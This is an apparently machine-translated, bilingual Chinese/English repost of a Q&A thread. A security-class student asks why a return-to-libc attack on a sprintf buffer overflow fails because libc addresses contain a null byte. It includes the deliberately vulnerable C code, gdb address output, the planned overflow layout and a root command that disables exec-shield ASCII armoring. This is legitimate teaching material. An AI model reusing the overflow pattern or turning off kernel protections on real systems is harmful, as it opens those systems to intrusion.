写一个return-to-libc攻击，但libc中以0×00加载到内存中 [英] Writing a return-to-libc attack, but libc is loaded at 0x00 in memory

问题描述

我正在写一个return-to-libc攻击我的系统的安全等级。首先，弱势code：

I'm writing a return to libc attack for my systems security class. First, the vulnerable code:

//vuln.c
#include <stdio.h>
#include <stdlib.h>

int loadconfig(void){
  char buf[1024];
  sprintf(buf, "%s/.config", getenv("HOME"));
  return 0;
}

int main(int argc, char **argv){
  loadconfig();
  return 0;
}

我想用一个return-to-libc攻击。编译和调试程序：

I want to use a return to libc attack. Compiling and debugging the program:

$ gcc -g -fno-stack-protector -o vuln vuln.c
$ gdb vuln
(gdb) break loadconfig
(gdb) run
Reached breakpoint blah blah blah.
(gdb) p $ebp
$1 = (void *) 0xbfffefb0
(gdb) p system
$2 = {<text variable, no debug info>} 0x0016db20 <system>
(gdb) p exit
$3 = {<text variable, no debug info>} 0x001639e0 <exit>
(gdb) x/2000s $esp
...
0xbffff5af:    "SHELL=/bin/bash"

要执行的攻击，我要溢出缓冲区到 loadconfig 的返回地址（又名 $ ESP + 4 ），与返回地址替换它系统，然后返回地址退出（因为系统预计真正的返回地址），则命令名称（ SHELL = /斌/庆典加6的地址，修剪在 SHELL = 部分）。这应该通过制定的垃圾为1024个字符 $ HOME 环境变量，那么的小端地址系统，退出和 /斌/庆典。

To execute the attack, I want to overflow the buffer into loadconfig's return address (aka $esp+4), replacing it with the return address for system, then the return address for exit (since system expects a real return address), then the command name (the address of SHELL=/bin/bash plus 6, to trim the SHELL= part). This should be possible by crafting a $HOME environment variable of 1024 characters of crap, then the little-endian address of system, exit, and /bin/bash.

不过，与每一个我试过计算机，系统被那个为0x00开始的地址的加载，这将空终止字符串的sprintf 读取并停止攻击死亡。是否有某种方式来强制的libc 来加载其他内存，还是我misinter preting攻击？

However, with every computer I've tried, system gets loaded at an address that starts with 0x00, which will null terminate the string that sprintf is reading and stop the attack dead. Is there some way to force libc to load elsewhere in memory, or am I misinterpreting the attack?

有关参考，我运行Ubuntu服务器在VirtualBox中（Windows主机），11.10虚拟机 GCC 版本4.6.1和 GDB 版本7.3-2011.08。编辑：ASLR是残疾人，我与 -fno-堆栈保护编译删除的金丝雀。因为我不是从堆栈中执行任何东西，我不需要 execstack 了。

For reference, I'm running an Ubuntu Server 11.10 virtual machine in VirtualBox (Windows host), with gcc version 4.6.1 and gdb version 7.3-2011.08. edit: ASLR is disabled, and I compiled with -fno-stack-protector to remove the canary. Since I'm not executing anything from the stack, I don't need to execstack it.

推荐答案

映射重要的libc函数来包含一个NULL字节称为ASCII铠装地址的行为。
这种保护是当前最近的Ubuntu发行版的红帽Exec的盾的一部分= https://wiki.ubuntu.com/SecurityTeam/Roadmap/KernelHardening\">link
要禁用它，你必须以root身份运行：

The act of mapping important libc function to addresses which contain a NULL byte is called ASCII armoring. This protection is part of RedHat Exec-shield which is currently enabled on recent ubuntu distros link To disable it you have to run as root:

的sysctl -w kernel.exec盾= 0

sysctl -w kernel.exec-shield=0

作为解释这里

顺便说一句，你可以找到关于如何绕过这里铠ASCII 上利用-DB 有趣的材料

By the way you can find interesting material about how to bypass ASCII armoring here on exploit-db

这篇关于写一个return-to-libc攻击，但libc中以0×00加载到内存中的文章就介绍到这了，希望我们推荐的答案对大家有所帮助，也希望大家多多支持IT屋！